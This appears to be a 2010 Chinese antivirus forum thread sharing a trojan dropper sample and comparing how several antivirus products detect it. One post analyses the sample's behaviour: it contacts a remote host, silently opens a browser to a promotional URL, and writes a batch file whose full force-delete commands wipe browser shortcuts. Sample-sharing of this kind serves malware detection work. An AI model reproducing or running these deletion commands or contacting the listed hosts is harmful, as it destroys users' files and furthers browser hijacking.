高質量

显示全部楼层 · 发表于 2010-11-4 07:07:41

avira kill dropper.gen

显示全部楼层 · 发表于 2010-11-4 07:13:06

to eset

http://samples.nod32.com.sg/inde ... 41ce405ae9ee785c452

显示全部楼层 · 发表于 2010-11-4 09:12:22

红伞扫描无反应，运行被拦截

显示全部楼层 · 发表于 2010-11-4 09:25:42

过VSE，360主防解压之后无反应，网盾报未知

显示全部楼层 · 发表于 2010-11-4 09:31:19

显示全部楼层 · 发表于 2010-11-4 10:12:59

很强悍啦。

显示全部楼层 · 发表于 2010-11-4 10:28:49

总共创建6个线程。
1，访问远程文件：new.9688.la/5day.txt    Socket连接IP：61.147.75.36：端口：80.
2，在该目录下创建配置文件C:\Documents and Settings\Administrator\Application Data\360se\360se.ini 以及C:\Documents and Settings\Administrator\Application Data\Kingsoft\kws\kws.ini  然后安装金山网盾的软件
3，创建一个批处理文件C：2222.bat 内容为：
  del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet*.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\*.url"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\*.ink"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\*浏览器*.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\腾讯TT.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\Opera.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\傲游*.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\*firefox*.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\*.ink" /f/q/a
del "C:\Documents and Settings\Administrator\桌面\IEXP*.*" /f/q/a
del "%userprofile%\「开始」菜单\程序\Intern*.*"  /f/q/a
del "C:\Documents and Settings\Administrator\桌面\Internat*.*"  /f/q/a
del "C:\Documents and Settings\Administrator\桌面\*hao123*"  /f/q/a
del "C:\Documents and Settings\Administrator\桌面\*.ink"  /f/q/a
del "C:\Documents and Settings\Administrator\桌面\*浏览器*.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\桌面\腾讯TT.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\桌面\Opera.lnk"  /f/q/a
del "C:\Documents and Settings\Administrator\桌面\傲游*.lnk"  /f/q/a
del "%userprofile%\「开始」菜单\*.url" /f/q/a
del "C:\Documents and Settings\All Users\「开始」菜单\*.url" /f/q/a
del "C:\Documents and Settings\All Users\桌面\*.ink" /f/q/a
del "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\*.*" /f/q/a
4，以隐藏窗口的方式启动进程
C:\Program Files\Internet Explorer\IEXPLORE.EXE http://www.9688.la./cn.html?ok
5，在临时文件路径下创建d.tmp文件：内容为：221.123.180.107,保留地址,,,

显示全部楼层 · 发表于 2010-11-4 10:37:13

Virus or unwanted program 'TR/Dropper.Gen [trojan]'
detected in file 'L:\down\nodepad.exe.
Action performed: Delete file

显示全部楼层 · 发表于 2010-11-4 10:40:59

TO KL

显示全部楼层 · 发表于 2010-11-4 11:06:09

过蜘蛛

[病毒样本] 高質量

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源